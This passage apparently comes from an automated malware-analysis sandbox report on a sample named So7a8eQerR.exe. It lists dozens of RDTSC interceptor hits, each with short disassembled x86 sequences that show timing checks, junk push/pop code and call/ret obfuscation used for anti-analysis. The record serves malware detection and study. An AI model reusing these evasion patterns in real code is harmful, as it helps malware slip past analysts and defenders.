                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B601B4 second address: B601B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B6024C second address: B60251 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B60251 second address: B60261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edi 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5FF99 second address: B5FFA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B60261 second address: B60266 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B60AFF second address: B60B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B61640 second address: B6164B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA5CCB7DEC6h 0x0000000a popad 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B60B04 second address: B60B09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B62049 second address: B6204F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B60B09 second address: B60B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B62CFD second address: B62D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B62D03 second address: B62D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA5CCB5262Ch 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jl 00007FA5CCB52626h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B62D21 second address: B62D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B6447F second address: B64483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B64483 second address: B64487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B64487 second address: B644D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007FA5CCB52628h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 push 00000000h 0x00000023 jp 00007FA5CCB5262Ch 0x00000029 sub ebx, dword ptr [ebp+1244CD30h] 0x0000002f push 00000000h 0x00000031 or edi, dword ptr [ebp+122D1F27h] 0x00000037 xchg eax, esi 0x00000038 push ecx 0x00000039 jl 00007FA5CCB5262Ch 0x0000003f pop ecx 0x00000040 push eax 0x00000041 push edi 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B644D6 second address: B644DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B653F5 second address: B65454 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB52631h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a nop 0x0000000b push eax 0x0000000c sub edi, dword ptr [ebp+122D35B5h] 0x00000012 pop ebx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FA5CCB52628h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 mov ebx, esi 0x00000034 pop edi 0x00000035 sub edi, 4A2BFA36h 0x0000003b push eax 0x0000003c pushad 0x0000003d jl 00007FA5CCB52628h 0x00000043 pushad 0x00000044 jo 00007FA5CCB52626h 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B66319 second address: B6631F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B67237 second address: B672A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FA5CCB52634h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FA5CCB52628h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov bx, dx 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007FA5CCB52628h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a push 00000000h 0x0000004c push eax 0x0000004d push ebx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B672A6 second address: B672AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B65555 second address: B6555A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B66520 second address: B6652B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA5CCB7DEC6h 0x0000000a popad 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B6652B second address: B66530 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B66530 second address: B66598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov dword ptr [ebp+122D2716h], eax 0x00000017 mov dword ptr fs:[00000000h], esp 0x0000001e or dword ptr [ebp+122D23B2h], ecx 0x00000024 mov eax, dword ptr [ebp+122D139Dh] 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007FA5CCB7DEC8h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 and ebx, 40C7A673h 0x0000004a push FFFFFFFFh 0x0000004c mov edi, dword ptr [ebp+122D3601h] 0x00000052 nop 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 jl 00007FA5CCB7DEC6h 0x0000005d rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B66598 second address: B665AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB52630h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B6A846 second address: B6A861 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA5CCB7DED7h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B69926 second address: B69941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA5CCB52636h 0x00000009 popad 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B6A861 second address: B6A870 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B6A870 second address: B6A87E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB5262Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B6A87E second address: B6A884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B6F9B4 second address: B6F9B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B6BA5E second address: B6BA62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B6BA62 second address: B6BA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B6BB4C second address: B6BB52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B71B61 second address: B71B65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B71B65 second address: B71B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B74CC4 second address: B74CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FA5CCB52638h 0x0000000a popad 0x0000000b push eax 0x0000000c jp 00007FA5CCB5262Eh 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B6DB17 second address: B6DB2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA5CCB7DED0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B6DB2C second address: B6DB39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B6DB39 second address: B6DB47 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA5CCB7DEC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B6DC0F second address: B6DC1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FA5CCB52626h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B6EB2D second address: B6EB33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B72D02 second address: B72D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B74F71 second address: B74F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA5CCB7DED8h 0x00000009 popad 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B7E07B second address: B7E0A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jmp 00007FA5CCB52638h 0x0000000c pushad 0x0000000d jg 00007FA5CCB52626h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B7E0A3 second address: B7E0A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B840B0 second address: B840DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB52632h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FA5CCB5262Ah 0x00000012 jbe 00007FA5CCB52626h 0x00000018 popad 0x00000019 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B840DB second address: B840E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FA5CCB7DEC6h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B840E5 second address: B840E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B840E9 second address: B84134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d jmp 00007FA5CCB7DED1h 0x00000012 push ecx 0x00000013 pushad 0x00000014 popad 0x00000015 pop ecx 0x00000016 popad 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jno 00007FA5CCB7DEC6h 0x00000023 popad 0x00000024 ja 00007FA5CCB7DEC8h 0x0000002a popad 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jnl 00007FA5CCB7DECCh 0x00000037 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B84134 second address: B8413A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B8413A second address: B8413E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B8908C second address: B89090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B89090 second address: B89094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B89094 second address: B890BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FA5CCB52646h 0x0000000c jmp 00007FA5CCB52632h 0x00000011 jbe 00007FA5CCB5262Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B885EC second address: B88607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA5CCB7DED5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B88607 second address: B8860B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B8860B second address: B8860F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B888C6 second address: B888CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B888CC second address: B88903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FA5CCB7DED6h 0x0000000e pop ecx 0x0000000f jmp 00007FA5CCB7DECFh 0x00000014 jnp 00007FA5CCB7DECCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B8DF1A second address: B8DF1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5B579 second address: B5B592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA5CCB7DED5h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5B592 second address: B5B596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5C179 second address: B5C17F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5C17F second address: B5C19B instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA5CCB52626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FA5CCB5262Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5C19B second address: B5C19F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5C19F second address: B5C231 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 pushad 0x00000009 movzx ebx, di 0x0000000c js 00007FA5CCB5262Ch 0x00000012 mov ebx, dword ptr [ebp+122D3555h] 0x00000018 popad 0x00000019 lea eax, dword ptr [ebp+1246FC53h] 0x0000001f mov dword ptr [ebp+122D1F4Eh], ebx 0x00000025 push eax 0x00000026 jnc 00007FA5CCB5262Ah 0x0000002c mov dword ptr [esp], eax 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007FA5CCB52628h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 0000001Dh 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 jmp 00007FA5CCB5262Ah 0x0000004e lea eax, dword ptr [ebp+1246FC0Fh] 0x00000054 push 00000000h 0x00000056 push esi 0x00000057 call 00007FA5CCB52628h 0x0000005c pop esi 0x0000005d mov dword ptr [esp+04h], esi 0x00000061 add dword ptr [esp+04h], 00000015h 0x00000069 inc esi 0x0000006a push esi 0x0000006b ret 0x0000006c pop esi 0x0000006d ret 0x0000006e mov edi, dword ptr [ebp+122D1FCAh] 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a popad 0x0000007b rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5C231 second address: B5C237 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5C237 second address: B4664D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov cx, di 0x0000000e call dword ptr [ebp+122D27D0h] 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jnp 00007FA5CCB52626h 0x0000001d rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B8DAB2 second address: B8DAB7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B924A7 second address: B924CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB52638h 0x00000007 jc 00007FA5CCB52626h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B92BB0 second address: B92BC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB7DECBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B92BC6 second address: B92BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FA5CCB52626h 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B92D40 second address: B92D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA5CCB7DED9h 0x00000009 popad 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B9323E second address: B93244 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B93244 second address: B93255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007FA5CCB7DEC6h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B93255 second address: B9327A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FA5CCB52637h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007FA5CCB5262Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B91C2B second address: B91C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA5CCB7DECFh 0x0000000a jmp 00007FA5CCB7DED9h 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B9A7FB second address: B9A7FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B9A942 second address: B9A946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B9AD2B second address: B9AD30 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B9A525 second address: B9A52F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA5CCB7DEC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B9A52F second address: B9A538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
